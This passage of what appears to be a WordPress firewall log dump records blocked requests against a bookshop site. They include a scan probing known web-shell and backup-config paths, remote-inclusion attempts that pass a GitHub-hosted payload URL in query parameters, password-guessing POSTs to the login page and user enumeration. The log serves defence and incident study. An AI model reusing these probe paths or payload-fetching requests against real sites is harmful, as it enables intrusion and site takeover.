Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hQLxrvoZMnj7bm2T45E1eYUK',0,1637175962.1773,392,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9VTvajgb6miO3dsMJXxUfPWk',0,1637175964.6647,382,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SsWaqKIdkvX1fhborB8niUj6',0,1637175972.7257,333,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JxBXngv3E4jGIyk5TfwucPKQ',0,1637175974.9965,395,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ocP4KVj8EGmJtTWbMdD1UOR9',0,1637175977.7570,389,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','v6Bt3Og8jYcU7NbMoD2wLW5R',0,1637175980.1939,346,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','d3crLzVHhSpYuFgNTW4Kx5wU',0,1637175984.2690,335,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KRIbvF5CN6rYjpTEsMc2y3fx',0,1637175985.9180,375,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4nNK2E3CmXvA6VYlyUSPtGgj',0,1637175988.0749,484,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zsP1SJ75cGaV06KfFuOywrpb',0,1637175989.9083,425,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yiwFIKb9Sae26mzAUnXTWNjD',0,1637175994.8695,354,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CatBPMwHUJVX3IT7fxdiyAq5',0,1637175997.2989,536,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','thEd1P8oNkquVcjg5xSlUKnp',0,1637175999.3959,491,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fKUOCvWl9ihk3SZJnxGNP6em',0,1637176012.5359,388,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VIAKEbjWyC1wziSZeaNkqgvn',0,1637176014.9542,340,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cdAhq1fmt26rYiWXxvCBDkUH',0,1637176017.1413,589,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LMtmE1BI597YGajVA8SzsbQU',0,1637176019.0888,371,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DAHvORkuwhITrGQPXBs6jtdz',0,1637176020.6688,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Uwlz2tsaW1duihSy3oVG4nTr',0,1637176027.0664,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','H06zxVFSkqwJjtvAdecrZmB1',0,1637176028.9917,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ACjSqc3bLsKkheZWtNrayD0U',0,1637176031.1973,458,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','NKZj8vyCrowFh2QzT46bsSGx',0,1637176033.3735,649,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wepiTrtqOzNIclKR3M2YLQ7V',0,1637176035.9453,380,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Twex6SZRBzG5EHrnbdAock7L',0,1637176037.7293,402,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RUMJfI369ljdxH0NgBkbiD4y',0,1637176039.4629,378,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8NAwqBudXvl0xbZSoc5TYyOD',0,1637176041.5491,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VdnsyZzkjXBfFJA02WSoqevL',0,1637176043.5758,371,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KGZQdcEw87jFxmu6PUqohJfs',0,1637176045.5981,394,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fzXOuUVMP92KED6SFNYI8JWT',0,1637176047.5426,395,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F03Bp4gmvAE6wrHYc1CoSWiX',0,1637176049.6240,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mh0BSo2kHGNWvgilz4YuA3UZ',0,1637176051.5831,420,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1kBCQSuPjV3Ia5OqGdJveLcU',0,1637176053.7559,406,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','slHP6VX782amjJoRMqKOBDZn',0,1637176056.0970,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9M6OC4EaXkZ0tzTDSYulGUjh',0,1637176058.4373,403,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QbaYXNOmAst2z4PcdMJHV9nT',0,1637176060.3704,374,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','azWXPpfLDe148HnvRq2c67li',0,1637176062.1890,406,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LB7z5GRwyqPfdYOsVvFSZnl9',0,1637176064.2033,438,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','45bA2TvK39NSLFlOHMWeGkVP',0,1637176066.3360,949,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TWFkiAfUyGQ3SCrRvx15P8eN',0,1637176068.9290,417,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O31qKdZLmoUpxjAaCDTtXHsM',0,1637176071.3596,402,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bfXMBYANSEDLGZ93hdIOkgJm',0,1637176074.6980,416,'','GET',403,0,700,0,1,'',0),('122.128.106.186',2055236282,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','dx4HLIBfSuDRnAQC10Vv8re5',0,1637177039.3123,600,'','POST',403,0,600,0,1,'',0),('185.220.102.253',3118229245,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3) AppleWebKit\\/537.43 (KHTML, like Gecko) Chrome\\/88.0.4324.182 Safari\\/537.36 OPR\\/74.0.3911.203\"}','v0icEQ1T5CqapVdfKNOF7UGA',0,1637178219.7890,541,'','POST',403,0,600,0,1,'',0),('69.163.232.79',1168369743,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','jPZIRgDoW6phwJ7sT4e3mQbM',0,1637178396.7416,1395,'','POST',403,0,600,0,1,'',0),('204.12.198.244',3423389428,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','QGbV4qEZvNR2FfOI59lj83um',0,1637179354.0943,551,'','POST',403,0,600,0,1,'',0),('69.30.217.109',1159649645,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','yHw7D4ZJlQWGpNF5Lj86Pbrv',0,1637181263.1552,312,'','POST',403,0,600,0,1,'',0),('94.153.161.234',1587126762,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','ZNBT9JLHYPV0nwc7dyD2bmav',0,1637182523.7776,502,'','POST',403,0,600,0,1,'',0),('69.30.217.109',1159649645,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.114 Safari\\/537.36\"}','cevrupaFMYnBWEiUslkRZLyV',0,1637182825.2101,449,'','POST',403,0,600,0,1,'',0),('69.163.232.79',1168369743,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','hY0XaPSZ82GsvfLerJlcO5qN',0,1637183969.4203,673,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','LR7TJWKer410DgEin3FVPtMo',0,1637184087.8113,439,'','GET',403,0,700,0,1,'',0),('103.142.26.247',1737366263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','bkyuv4UW9AjmiYZKeORgH2zc',0,1637185319.4570,478,'','POST',403,0,600,0,1,'',0),('128.199.190.211',2160574163,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','5Xbc4CVasowvHS0jUMT2rkPQ',0,1637188012.3391,511,'','POST',403,0,600,0,1,'',0),('192.187.118.206',3233511118,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','jyNP3S9GukRBdmzhLtw4XI2q',0,1637188988.8606,226,'','POST',403,0,600,0,1,'',0),('23.23.6.16',387384848,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','f9iBwjzoltEN5SkTuOcRgJ18',0,1637190085.4674,1834,'','GET',403,0,520,0,1,'',0),('167.86.118.101',2807461477,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','vqkwobZtMNAeSVP5sUEz7GLl',0,1637190680.9827,496,'','POST',403,0,600,0,1,'',0),('173.208.152.238',2916129006,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','gAb5mwQlKNCxqJjp2LDBikXY',0,1637191307.2606,419,'','POST',403,0,600,0,1,'',0),('45.158.15.146',765333394,'','https://ashbooks.co.uk/wp-sling.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','XcF32wVbNz5mxYsETteJjiKW',0,1637192493.9228,432,'','GET',403,0,700,0,1,'',0),('39.107.236.213',661384405,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"http:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','A1dqywW3BUTb4rVne9Q2ZjFp',0,1637192842.0292,1468,'','GET',403,0,700,0,1,'',0),('161.97.146.123',2707526267,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','f7ljTn28vFd3eoIKsbMGrzUB',0,1637193439.2135,481,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/style.php?sig=rename&source_name=boktandosyaadi1&rename=boktandosyaadi2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','lJTKAdx1ocvHQpeu5m9FzCNR',0,1637193961.3209,439,'','GET',403,0,700,0,1,'',0),('188.166.56.218',3165010138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','b9B1IWQPjYiNloFLdED6AvuJ',0,1637194796.6198,548,'','POST',403,0,600,0,1,'',0),('107.150.57.34',1805007138,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','TxBUfhFjbeuLRQ09c8s73Wdk',0,1637196066.9787,166,'','POST',403,0,600,0,1,'',0),('95.217.195.206',1608106958,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','EwtH9vl1XQzSPBg54aJjb3VM',0,1637196140.6859,468,'','POST',403,0,600,0,1,'',0),('204.12.198.244',3423389428,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','f2t6TJGPh3AcZEQ47emzMWi5',0,1637196627.9838,179,'','POST',403,0,600,0,1,'',0),('138.68.69.48',2319729968,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','BijuUhlDVPsdWr2ZKSOQoGwv',0,1637198903.9640,512,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','gh9l4wLukUx3DdGfSRen2V0B',0,1637199744.3417,444,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','JK8pwAoec3OYhL0mUNat1EqR',0,1637199748.9306,406,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','t6bwrR0yLlEdaozPVpCOFhKZ',0,1637199756.9010,441,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','lVpdv3HcjeYsJZn5u1xTSLNO',0,1637199762.8538,181,'','POST',403,0,600,0,1,'',0),('121.43.170.78',2032904782,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','KXHJonlubM2aGDv0hfygFS53',0,1637200401.4461,560,'','POST',403,0,600,0,1,'',0),('173.208.152.238',2916129006,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','kzJRCBTcHK4vP6Us5pugraWO',0,1637201920.4716,629,'','POST',403,0,600,0,1,'',0),('178.128.194.13',2994782733,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','XPTYvOm1AocBrd9wZN4y8HUs',0,1637201986.2608,932,'','POST',403,0,600,0,1,'',0),('63.141.252.70',1066269766,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','pd3ZEur62qfJL71yHhc9tXin',0,1637203528.1737,2870,'','POST',403,0,600,0,1,'',0),('178.151.64.197',2996256965,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','RrFapl90gj5BcO2nQySCX1wZ',0,1637203570.8746,589,'','POST',403,0,600,0,1,'',0),('3.1.209.37',50450725,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','rYtbLTlwMyD3ekmWjs7zIuvS',0,1637205056.3814,490,'','POST',403,0,600,0,1,'',0),('155.133.129.13',2609217805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','L5fprDWyU2deAOV37na6wcuZ',0,1637206485.8681,618,'','POST',403,0,600,0,1,'',0),('193.148.164.26',3247744026,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','9nz2JpwjU8TVEYRah1qvtcyF',0,1637207869.1012,434,'','POST',403,0,600,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 